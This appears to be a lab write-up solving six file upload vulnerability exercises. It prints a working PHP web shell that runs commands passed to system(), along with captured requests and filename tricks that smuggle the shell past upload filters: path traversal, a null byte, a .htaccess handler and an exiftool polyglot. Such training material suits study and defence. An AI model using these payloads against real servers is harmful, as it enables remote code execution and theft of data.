File Upload Vulnerabilities

Lab: Remote code execution via web shell upload

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

First, we will login into the web application using the credentials that was given.

After logging in, we should see this web page.

We can try to upload a webshell directly. The payload that we will be using is this:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

After uploading, we can see this message.

We can visit that webpage by right clicking on the broken image file and Open image in new tab.

We should be able to see this

If we type ls and press Execute, it should return us this page.

Since we need to know the content of /home/carlos/secret, we just need to cat that folder to get the content of that folder

Lab: Web shell upload via Content-Type restriction bypass

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

Same as the previous lab, we will login first to see the My Account page.

This time we will upload an image file to see how does it work.

POST /my-account/avatar HTTP/2
Host: 0ac3005e04a7219b82dc521f00c00079.web-security-academy.net
Cookie: session=MXaRfBaZ6k8qJi2GsG0E31OdLY34BICu
Content-Length: 2980
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: https://0ac3005e04a7219b82dc521f00c00079.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzuBxNrqg64PoyRKC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ac3005e04a7219b82dc521f00c00079.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

------WebKitFormBoundaryzuBxNrqg64PoyRKC
Content-Disposition: form-data; name="avatar"; filename="images.png"
Content-Type: image/png

‰PNG

...
------WebKitFormBoundaryzuBxNrqg64PoyRKC
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryzuBxNrqg64PoyRKC
Content-Disposition: form-data; name="csrf"

YmyTIYUGVgDLVVfY6KS6HR6CcdgPLr3q
------WebKitFormBoundaryzuBxNrqg64PoyRKC--

We can see that they use multipart form to upload the image file.

We will try to use upload the webshell that we uploaded in the previous lab.

However, this time they prevented us from uploading it.

So, we can try to upload the payload as .png file but modify the request on Burp Suite before sending to the application as the check might not be done in the backend.

This is the request that we are intercepting:

POST /my-account/avatar HTTP/2
Host: 0ac3005e04a7219b82dc521f00c00079.web-security-academy.net
Cookie: session=MXaRfBaZ6k8qJi2GsG0E31OdLY34BICu
Content-Length: 771
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: https://0ac3005e04a7219b82dc521f00c00079.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB2Ji4iiI9LNe7zyv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ac3005e04a7219b82dc521f00c00079.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

------WebKitFormBoundaryB2Ji4iiI9LNe7zyv
Content-Disposition: form-data; name="avatar"; filename="exploit_1.png"
Content-Type: image/png

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
------WebKitFormBoundaryB2Ji4iiI9LNe7zyv
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryB2Ji4iiI9LNe7zyv
Content-Disposition: form-data; name="csrf"

YmyTIYUGVgDLVVfY6KS6HR6CcdgPLr3q
------WebKitFormBoundaryB2Ji4iiI9LNe7zyv--

We will just modify this 1 line to this:

Content-Disposition: form-data; name="avatar"; filename="exploit_1.php"

After modifying, we can just release the request to the application. We can see that the file has been uploaded.

Next, we can visit that file just like how we did in the previous lab and execute the same command to get the content of /home/carlos/secret.

Lab: Web shell upload via path traversal

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

Same as the previous lab, we will login first to see the My Account page.

We can try to upload the payload from the 1st lab. It turns out we can upload it.

If we try to run any commands, we can see that the command cannot be executed.

There is a possibility that this folder does not allow execution of PHP code. Let see if we can upload the previous file directory.

First we will send the request for uploading the file to Repeater.

Next, we will change this line to this:

...
Content-Disposition: form-data; name="avatar"; filename="../exploit_1.php"
...

Finally, we will send the request and see does it upload successfully.

HTTP/2 200 OK
Date: Wed, 24 Jul 2024 04:51:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 134

The file avatars/exploit_1.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

However, it seems that the application remove any path traversal before using the filename. We can try to URL encode ../ and see if it works

...
Content-Disposition: form-data; name="avatar"; filename="%2e%2e%2fexploit_1.php"
...

Sure enough, after sending in the request, we can see this in the response.

HTTP/2 200 OK
Date: Wed, 24 Jul 2024 04:53:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 137

The file avatars/../exploit_1.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

Finally, we are able to execute the PHP code

From there, we can get the content of /home/carlos/secret.

Lab: Web shell upload via extension blacklist bypass

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

Same as the previous lab, we will login first to see the My Account page.

This is very similar to .htaccess vulnerability

How to execute php files with .html extension?Stack Overflow

So if we follow the same step, first we need to upload a .htaccess file with this as the content:

AddType application/x-httpd-php .dork

Next, we will try to upload this file first and we are able to do so.

So the next file, we can upload is the same exploit file that we have been using but with .dork extention.

We are also able to upload the .dork file.

After which, we should be able to execute commands on that web page.

From there, we should be able to get the content of /home/carlos/secret.

Lab: Web shell upload via obfuscated file extension

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

Same as the previous lab, we will login first to see the My Account page.

We will first try to upload the same payload as before.

However, we are unable to upload it.

Next, we will send this request to Repeater to play around the request.

If we modify the filename to be this:

...
Content-Disposition: form-data; name="avatar"; filename="exploit_1.php%00.png"
...

We are able to upload the file

HTTP/2 200 OK
Date: Wed, 24 Jul 2024 05:27:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 134

The file avatars/exploit_1.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

From there, we are able to access that website and execute commands.

From there, we are able to get the content of /home/carlos/secret

Lab: Remote code execution via polyglot web shell upload

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

Same as the previous lab, we will login first to see the My Account page.

Next, we will use exiftool to create a polygot web shell.

$ $ exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" images.png -o polyglot.php
    1 image files created

Finally, we will upload the file that we have just created to the application

We can see that the polygot web shell is uploaded.

We will just visit that web page and capture the request on Burp Suite.

Finally, we just need to search for START and END to find the content of /home/carlos/secret.